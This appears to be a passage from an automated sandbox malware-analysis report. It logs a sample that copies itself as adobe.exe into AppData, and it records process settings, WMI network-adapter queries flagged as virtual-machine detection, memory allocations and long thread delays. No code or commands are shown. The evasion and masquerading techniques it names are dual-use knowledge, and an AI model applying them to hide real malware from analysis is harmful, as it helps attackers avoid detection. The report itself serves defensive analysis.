Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Memory allocated: 3100000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Memory allocated: 3390000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Memory allocated: 3190000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Memory allocated: B90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Memory allocated: 29B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Memory allocated: 49B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 1440000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 3020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 5020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 13A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 2EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 4EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: FC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 2960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 4960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 2980000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 2BE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory allocated: 2B20000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 598718	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 598594	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 597374	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 597141	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 597032	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 596907	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 596771	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 596478	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 596326	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 596204	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 596079	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 595829	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 595704	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 595579	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 595454	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 595204	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 595079	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 594422	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 594305	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 594171	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 594044	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 593927	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Thread delayed: delay time: 593688	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598999	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598016	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596047	Jump to behavior
